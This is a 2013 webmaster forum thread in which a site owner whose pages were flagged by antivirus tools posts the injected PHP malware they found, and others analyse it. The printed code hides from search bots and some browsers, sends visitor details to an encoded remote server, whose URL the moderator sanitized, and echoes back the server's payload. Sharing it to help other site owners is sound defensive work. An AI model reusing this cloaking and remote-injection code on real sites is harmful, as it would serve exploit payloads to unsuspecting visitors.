Welcome to WebmasterWorld Guest from 54.162.155.183

Forum Moderators: phranque

Message Too Old, No Replies

Strange Virus Notice for Website

AVG and eset nod32 shows virus notice

     
9:36 am on May 1, 2013 (gmt 0)



Hello,

Since yesterday, both AVG and ESET NOD32 do not allow to access one of our websites.

I did not find any malicious code when i checked the source code.

I am desperately looking to resolve the issue.

Check [snip]


ESET NOD says site is infected with Kryptik.ajz

AVG says blackhole exploit Trojan

[edited by: phranque at 10:36 am (utc) on May 1, 2013]
[edit reason] no personal urls please [/edit]

10:37 am on May 1, 2013 (gmt 0)

WebmasterWorld Administrator phranque is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month



welcome to WebmasterWorld, klpm!


i would look for any obfuscated javascript and especially anything that looks like a document.write or similar.
11:59 am on May 1, 2013 (gmt 0)



thanks phranque. but i finally figured out and solved the issue (thanks to "temporary disable" option in AVG).

would like to share the code thinking it may help other website owners.

The code was acting very smart.

malicious code does not generate if the page is accessed by search bot such as google, msn and yahoo ( so that website owner does not come to know about virus infection)

check the code below....

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( '[some encoded malware here]').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

[edited by: phranque at 12:45 pm (utc) on May 1, 2013]
[edit reason] sanitized [/edit]

11:29 pm on May 1, 2013 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



It's is interesting that it treats the browsers opera, chrome and safari as being bots and doesn't serve them the malware.
So it must be targeting IE and Firefox.

Also it looks like the writer of this code may not be a native English speaker as there are multiple spelling and grammar mistakes in the comments.

A search for the phrase "Looks for google serch bot" comes up with a fair number of results dating back to at least 2010.

What you need to determine is how your site was compromised in the first place allowing them to add the PHP script. It looks like a fair number of the sites that were infected were Wordpress ones possibly using this vulnerability.
[markmaunder.com...]
 

Featured Threads

Hot Threads This Week

Hot Threads This Month